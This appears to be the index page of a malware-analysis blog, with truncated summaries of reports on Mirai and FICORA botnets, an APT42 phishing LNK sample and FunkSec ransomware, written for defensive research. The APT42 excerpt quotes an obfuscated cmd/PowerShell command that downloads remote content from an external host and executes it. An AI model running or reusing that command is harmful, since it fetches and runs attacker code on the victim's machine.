Malware Analysis Space

  Summary Mirai botnet family first discovered in 2016, the botnet will look for devices of IoT with scanner which embedded a dictionary for brute force attack and vulnerabilities exploit, and can do a DDoS attack like TCP flood and UDP flood and so on, later on, the source code distributed in github and different variants came from that time, nowadays, botnet is big challenging and threat to IoT, it is worthy doing research with different instruction sets, this report come here for a new try and let’s do it.     Technical analysis   This botnet is the ELF for Intel 386 (executable). The hash MD5:  6950F28382D7F11E18BDF53F3983117B The load segment displays lots of source files that can help analysts to learn from which source code is being included and infer the main function of malware, likely with the source file “kill.c” to tell the analyst it may use the kill command to stop the process and “socket.c,” which can be used for malware to conne...

  Summary I recently noted that the Google Threat Analysis Group was sharing insights on APT42. During 2024, I pay more attention to APT groups doing phishing around the world; of course, as you know, LNK is the type of phishing for delivering malware and has been popular for the past many years, and PowerShell is also now very popular for making malware. So here it is that I want to analyze the sample of APT42 that was shared by TAG.   Technical analysis   The hash sha256 c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3 Link information for property store data block. Figure1- Link Information For Property   Extract a long string that appears obfuscated is “ C:\Windows\System32\cmd.exe /c "set mv=popdsxwerpdsxshpdsxell -wpdsx pdsx1 "$epdsxs=(wgepdsxt -Urpdsxi  https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicpdsxParsing).Content;&(gcm i?x)$es" & call %mv:pdsx=% ". String Replacement : %mv:pdsx=% replaces all instances of p...

Summary From the checkpoint research, the FunkSec ransomware group first emerged publicly in late 2024 and rapidly gained prominence by publishing over 85 claimed victims—more than any other ransomware group in the month of December. I did research with a shared sample.   Technical Analysis   FunkSec Ransomware is named by the binary inside strings “funksec.pdb,” its extension “.funksec,” and ransom note, written in the Rust computer language and run on Windows and compiled in the environment of “C:\\Users\\Abdellah\\.cargo\\...,” with the time date stamp “2024-12-31 20:26:29,” AMD64 Architecture, without a packer. And "This program requires administrator privileges." Figure1-Binary Information Figure2-Ransomware Note Snippet  Like the other ransom group, it generated a special readme file as a ransom note to tell the victim about “stop” and “what happened,” including what the bitcoin wallet address is, how to buy bitcoin, how much bitcoin to pay, and the contac...

  Summary Since 2016, when the Mirai source code was published, similar family botnets have emerged; more and more botnets have appeared. and IoT security has become a big challenge. That makes me care about botnet development and do research. Recently, Mirai attracts me again; I like to do analysis with it in a different way, so here it is.   Analysis   Protect and Disguise Itself Like any other malware that does anti-debug from an analyst, Mirai uses the function anti_gdb_entry with one parameter to monitor gdb debug. If it discovers debugging, it executes the function unlink to delete itself and tries to prevent the watchdog from rebooting the device and keep itself running all the time, not offline. Figure1-anti-debug, delete self and keeping running   Using a random string which the length can be either 12, 16, 20, or 24 as name of processes and execute util_strcpy function for copying string to args[0] and hiding a real name. Figure2-Hide argv0 ...

  Summary   Back to December 26, 2024, FortiGuard Labs noticed a new variant called "FICORA" frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands like downloading malware, brute force attacks, and DDoS flooding attacks on victim hosts.   Analysis   Why call the botnet named “FICORA”? FICORA bot named from malware inside strings Figure1- special strings   The shell script executes multiple strategies , such as wget, ftpget, tftp, and curl, to get malware FICORA. Figure2-downloader with multiple strategies for get malware     The shell script kills all processes with the same file extension. Figure3-downloader with kill -9 command   The shell script tries to find and kill any process containing the keyword “dvrHelper,” which can decode from hex to strings; below is a small part. Figure4- malware inside hexadecimal script Figure5- malware inside script wit...